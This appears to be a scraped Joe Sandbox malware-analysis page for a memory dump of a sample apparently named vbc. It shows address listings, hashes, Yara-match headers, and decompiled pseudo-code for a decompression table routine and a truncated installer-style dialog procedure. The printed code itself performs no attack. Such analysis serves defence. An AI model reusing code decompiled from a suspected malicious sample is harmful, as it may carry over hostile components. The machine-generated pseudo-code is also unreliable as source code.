0x00406b75
0x00406b75
0x00406b79
0x00406b79
0x00406b9b
0x00406b9e
0x00406ba0
0x00406ba3
0x00406ba8
0x00406b7e
0x00406b7e
0x00406b83
0x00406b85
0x00406b87
0x00406b8c
0x00406b92
0x00406b97
0x00406b99
0x00406b99
0x00406b8e
0x00406b8e
0x00406b8e
0x00406b8c
0x00000000
0x00406baa
0x00406bd7
0x00406bdc
0x00406bde
0x00406bdf
0x00406be1
0x00406be2
0x00406be2
0x00406be2
0x00406c0a
0x00406c0f
0x00406c0f
0x00000000
0x00406c0f
0x00406ba8
0x00406b6f
0x00406b12
0x00406b12
0x00406b13
0x00406b5d
0x00000000
0x00406b5d
0x00406b15
0x00406b16
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c72
0x00406c72
0x00406c72
0x00406c75
0x00000000
0x00000000
0x00406c52
0x00406c52
0x00406c56
0x00000000
0x00000000
0x00406c5c
0x00406c5c
0x00406c5f
0x00406c62
0x00406c67
0x00406c69
0x00406c6c
0x00406c6f
0x00406c6f
0x00406c6f
0x00406c77
0x00406c77
0x00406c7a
0x00406c7c
0x00406c81
0x00406c84
0x00406c86
0x00406c89
0x00000000
0x00000000
0x00406c8f
0x00406c8f
0x00406c91
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00000000
0x00000000
0x00406ca1
0x00406ca1
0x00406ca4
0x00406ca6
0x00406d44
0x00406d44
0x00406d47
0x00406d49
0x00406d49
0x00406d4c
0x00406d4f
0x00406d51
0x00406d53
0x00406d55
0x00406d55
0x00406d5e
0x00406d63
0x00406d66
0x00406d69
0x00406d6c
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d78
0x00406d78
0x00406d7e
0x00406d7e
0x00406d7e
0x00000000
0x00406d72
0x00406cac
0x00406cac
0x00406cb2
0x00406cb5
0x00406cb7
0x00406ce2
0x00406ce5
0x00406ceb
0x00406cf0
0x00406cf6
0x00406cfc
0x00406cfe
0x00406d01
0x00406d0a
0x00406d10
0x00406d10
0x00406d03
0x00406d05
0x00406d07
0x00406d07
0x00406d12
0x00406d18
0x00406d1b
0x00406d1d
0x00406d1f
0x00406d25
0x00406d27
0x00406d29
0x00406d2c
0x00406d35
0x00406d35
0x00406d37
0x00406d2e
0x00406d2e
0x00406d31
0x00406d31
0x00406d39
0x00406d39
0x00406d27
0x00406d3c
0x00406d3e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d3e
0x00406cb9
0x00406cb9
0x00406cbf
0x00406cc5
0x00406cc7
0x00000000
0x00000000
0x00406cc9
0x00406cc9
0x00406ccb
0x00406ccd
0x00406cd0
0x00406cd7
0x00406cd7
0x00406cd9
0x00406cd2
0x00406cd2
0x00406cd4
0x00406cd4
0x00406cdb
0x00406cdd
0x00406ce0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406de4
0x00406de7
0x00406dea
0x00406df0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fc7
0x00406fc7
0x00406fc7
0x00406fca
0x00406fcd
0x00406fcf
0x00406fd2
0x00406fd8
0x00406fdf
0x00406fe1
0x00000000
0x00000000
0x00406eb5
0x00406eb5
0x00406edd
0x00406edd
0x00406edd
0x00406edf
0x00000000
0x00000000
0x00406ebd
0x00406ebd
0x00406ec1
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406eca
0x00406ecd
0x00406ed0
0x00406ed2
0x00406ed4
0x00406ed7
0x00406eda
0x00406eda
0x00406eda
0x00406ee1
0x00406ee1
0x00406ee9
0x00406eec
0x00406ef2
0x00406ef5
0x00406ef9
0x00406efd
0x00406f00
0x00406f03
0x00406f1b
0x00406f1b
0x00406f1e
0x00406f2c
0x00406f2f
0x00406f20
0x00406f20
0x00406f22
0x00406f29
0x00406f29
0x00406f58
0x00406f58
0x00406f58
0x00406f5b
0x00406f5d
0x00000000
0x00000000
0x00406f38
0x00406f38
0x00406f3c
0x00000000
0x00000000
0x00406f42
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4d
0x00406f4f
0x00406f52
0x00406f55
0x00406f55
0x00406f55
0x00406f5f
0x00406f5f
0x00406f61
0x00406f63
0x00406f6e
0x00406f71
0x00406f74
0x00406f76
0x00406f78
0x00406f7a
0x00406f7d
0x00406f80
0x00406f85
0x00406f88
0x00406f8b
0x00406f8e
0x00406f95
0x00406f98
0x00406f9a
0x00000000
0x00000000
0x00406fa0
0x00406fa0
0x00406fa4
0x00406fb5
0x00406fb5
0x00406fb5
0x00406fb7
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fbb
0x00406fbd
0x00406fbe
0x00406fc1
0x00406fc1
0x00406fc1
0x00406fc4
0x00000000
0x00406fc4
0x00406fa6
0x00406fa6
0x00406fa9
0x00000000
0x00000000
0x00406faf
0x00406faf
0x00000000
0x00406faf
0x00406f05
0x00406f05
0x00406f07
0x00406f09
0x00406f0c
0x00406f0f
0x00406f13
0x00406f13
0x00406fe7
0x00406fe7
0x00406fea
0x00406ff1
0x00406ff5
0x00406ff7
0x00406ffa
0x00406ffd
0x00407002
0x00407005
0x00407007
0x00407008
0x0040700b
0x00407016
0x00407019
0x00407030
0x00407035
0x0040703c
0x00407041
0x00407045
0x00407047
0x00407047
0x00407047
0x0040704a
0x0040704c
0x00000000
0x00407052
0x00407052
0x00407056
0x00407061
0x00407074
0x00407079
0x0040707e
0x00407080
0x00000000
0x00000000
0x00407086
0x00407086
0x00407089
0x0040708b
0x00407099
0x00407099
0x0040709c
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x00000000
0x004070ae
0x0040708d
0x0040708d
0x00407093
0x00000000
0x00000000
0x00000000
0x00407093
0x00000000
0x00000000
0x00000000
0x00407432
0x00407432
0x00407438
0x0040743e
0x00407443
0x00407449
0x0040744f
0x00407451
0x00407454
0x0040745d
0x00407463
0x00407463
0x00407456
0x00407458
0x0040745a
0x0040745a
0x00407465
0x00407467
0x0040746a
0x004074a5
0x004074a5
0x00000000
0x0040746c
0x0040746c
0x0040746c
0x00407472
0x00407475
0x00407477
0x004074ac
0x004074ae
0x00000000
0x004074ae
0x00000000
0x00407477
0x00000000
0x00406ab6
0x00407484
0x00000000
0x00407484
0x00406e98
0x00406e9a
0x00000000
0x00000000
0x00406e9c
0x00406e9c
0x00406e9f
0x00000000
0x00406e9f
0x00406de4
0x00406da5
0x00407489
0x0040748c
0x0040748e
0x00407497
0x0040749d
0x00000000

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040755C Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432190;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432190 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00407567
0x0040756f
0x00407573
0x00407575
0x00407578
0x0040757a
0x0040757a
0x0040757c
0x00407583
0x00407585
0x00407585
0x0040758b
0x004075a0
0x004075a8
0x004075aa
0x004075ac
0x004075af
0x004075b0
0x004075b0
0x004075b6
0x00000000
0x00000000
0x004075b8
0x004075bb
0x00000000
0x00000000
0x00000000
0x004075bb
0x004075bf
0x004075c2
0x004075c4
0x004075c4
0x004075c7
0x004075cd
0x004075ce
0x00000000
0x00000000
0x00000000
0x004075ce
0x004075d3
0x004075d6
0x004075d8
0x004075d8
0x004075de
0x004075e0
0x004075f1
0x004075e4
0x004075e8
0x0040788d
0x00000000
0x0040788d
0x004075ee
0x004075ef
0x004075ef
0x004075f7
0x004075fa
0x004075fe
0x00407600
0x00407602
0x00407605
0x00000000
0x00000000
0x0040760d
0x00407613
0x00407615
0x00407617
0x00407618
0x0040762d
0x0040762d
0x00407630
0x00407632
0x00407632
0x00407634
0x00407639
0x0040763b
0x00407642
0x00407644
0x0040764c
0x0040764c
0x0040764e
0x0040764f
0x0040765e
0x00407662
0x00407666
0x00407669
0x0040766c
0x00407671
0x00407674
0x0040767a
0x00407681
0x00407687
0x00407880
0x00407880
0x00407885
0x00407894
0x00000000
0x00000000
0x00000000
0x00407885
0x00407694
0x00407697
0x0040769a
0x0040769d
0x004076a1
0x00000000
0x00000000
0x004076ac
0x004076af
0x004076b0
0x004076b2
0x004076b8
0x004076bb
0x00000000
0x00000000
0x004076c1
0x004076c2
0x004076c5
0x004076c8
0x004076cb
0x004076d1
0x004076d3
0x004076d3
0x004076db
0x004076df
0x004076e4
0x00407709
0x0040770f
0x00407711
0x00407713
0x00407716
0x0040771f
0x00000000
0x00000000
0x004076e6
0x004076e6
0x004076ef
0x004076f3
0x00000000
0x00000000
0x00407704
0x00407704
0x00407707
0x00000000
0x00000000
0x004076f7
0x004076fa
0x004076fc
0x00407700
0x00000000
0x00000000
0x00407702
0x00407702
0x00000000
0x00407704
0x00407728
0x0040772e
0x00407738
0x0040773a
0x0040773f
0x00407741
0x00407777
0x00407743
0x00407743
0x00407746
0x00407749
0x00407753
0x00407756
0x0040775d
0x00407768
0x0040776f
0x0040776f
0x00407779
0x0040777c
0x0040777e
0x00407784
0x00407784
0x0040778d
0x00407790
0x00407795
0x004077a4
0x004077ac
0x004077b1
0x004077d5
0x004077dd
0x004077e1
0x004077e7
0x004077b3
0x004077c1
0x004077c4
0x004077ca
0x004077ca
0x004077eb
0x004077a6
0x004077a6
0x004077a6
0x004077fc
0x00407800
0x0040780c
0x00407807
0x0040780a
0x0040780a
0x00407814
0x00407819
0x00407821
0x0040781d
0x0040781f
0x0040781f
0x00407827
0x00407829
0x00407830
0x0040783a
0x00407844
0x00407860
0x00407864
0x004076a9
0x004076af
0x004076b0
0x004076b2
0x004076b8
0x004076bb
0x00000000
0x00000000
0x00000000
0x004076bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407846
0x00407846
0x00407846
0x0040784b
0x00407854
0x0040785d
0x00000000
0x0040785d
0x0040786a
0x0040786a
0x0040786d
0x00407874
0x00407877
0x00000000
0x0040769a
0x0040761a
0x0040761c
0x0040761c
0x00407620
0x00407623
0x00407624
0x00407624
0x00000000
0x0040761c
0x00407590
0x00407596
0x00000000

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95

Uniqueness

Uniqueness Score: -1.00%

Function 03699963 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3690000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34c33924d42bb6ff3860e71c1e2cf7ee5d6855a5e0f7c97b979dcc47d3aba79a
Instruction ID: a4d8fecaeafe0cdff56682c81679e91ad1df11c53fa325aa61c882f3b1e59b33
Opcode Fuzzy Hash: 34c33924d42bb6ff3860e71c1e2cf7ee5d6855a5e0f7c97b979dcc47d3aba79a
Instruction Fuzzy Hash: CB3148326083459FEF249D6589D47EBB7EAAF64350F86452FDDC687204D7304582CB03

Uniqueness

Uniqueness Score: -1.00%

Function 0369CAD3 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3690000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87596c8d9862d4a29d92bfbe08b537897a3dbc40882f4670336596a3dcb17d98
Instruction ID: 3f263a7da96e4d0adf00ff710808d2f75a76d2d18189c6c5b9c96dc0cfe7e57d
Opcode Fuzzy Hash: 87596c8d9862d4a29d92bfbe08b537897a3dbc40882f4670336596a3dcb17d98
Instruction Fuzzy Hash: 5A212971601255DFEB65DF28D998BDA77B9FF09300F54455AEC0A9B312C331AA41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03699366 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3690000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0a4c249eaade08aefa81ebaac5cb197111a09459c395973364ce0da76687086
Instruction ID: 9716f56e6e039689fe79e1a5823e44ef4d5d0173b299fd5b09bb2e7287fc58d5
Opcode Fuzzy Hash: d0a4c249eaade08aefa81ebaac5cb197111a09459c395973364ce0da76687086
Instruction Fuzzy Hash: 87C0C04380C0264E3F01F87C2F0402814C10C4C711304420F0009DE74EFB80CD0A210A

Uniqueness

Uniqueness Score: -1.00%

Function 03699128 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3690000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00e274f6c14abfb43531402e48f6858ff71521fdfa52966b5d7499d6ca2361a0
Instruction ID: 909d982a1e9835de9b48bf67cc4e6e9a0bd569270bf74d9979afac4c2c613bee
Opcode Fuzzy Hash: 00e274f6c14abfb43531402e48f6858ff71521fdfa52966b5d7499d6ca2361a0
Instruction Fuzzy Hash: B3C048B6A029818BFB42DE48C481B4073B2BF60A44BC804A8F443CBA95E328ED41CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0369C501 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3690000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8fbad8ed9194e6f7d6068865c13625f92d1e587fbe873806ec430d910d7419e
Instruction ID: 4eda5e0ed91a6889ad16f779470b6cd44f6781339a81b32d78b8c36689049bf0
Opcode Fuzzy Hash: f8fbad8ed9194e6f7d6068865c13625f92d1e587fbe873806ec430d910d7419e
Instruction Fuzzy Hash: 0BB009356A6A80CFDE9ACA19D290E51B3B8FB45A50B4269D1E4129BB62C268E911CA04

Uniqueness

Uniqueness Score: -1.00%

Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x434f28;
				_v28 =  *0x434f10 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x434f19 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E54(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42d24c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x42d260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x42d260;
									_t201 =  *0x434f28;
									_v64 = 0xf030;
									_v24 = 0;
